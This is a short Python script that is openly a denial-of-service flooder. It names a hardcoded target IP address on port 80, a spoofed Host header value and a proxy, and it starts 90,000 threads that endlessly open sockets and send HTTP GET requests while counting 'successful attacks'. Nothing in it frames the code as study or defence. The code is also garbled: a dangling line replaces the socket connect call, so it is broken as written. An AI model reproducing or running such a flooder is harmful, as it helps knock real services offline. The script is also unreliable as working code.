import socket
import threading
import random

target = "172.67.21.127"
fake_ip = "101.47.137.213."
port =  80
proxies = 'http://101.47.137.213:20000'

attack_num = 0


def attack():
    while True:
        soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                   (target, port))

        soc.sendto(("GET /"+target+" HTTP/1.1\r\n").encode("ascii"),
                   (target, port))

        soc.sendto(("Host: "+fake_ip+"\r\n\r\n").encode("ascii"),
                   (target, port))

        global attack_num
        attack_num += 1
        print(f'sucsess_attack {target} :{attack_num}')


        soc.close()

for i in range(90000):
    thread = threading.Thread(target=attack)
    thread.start()
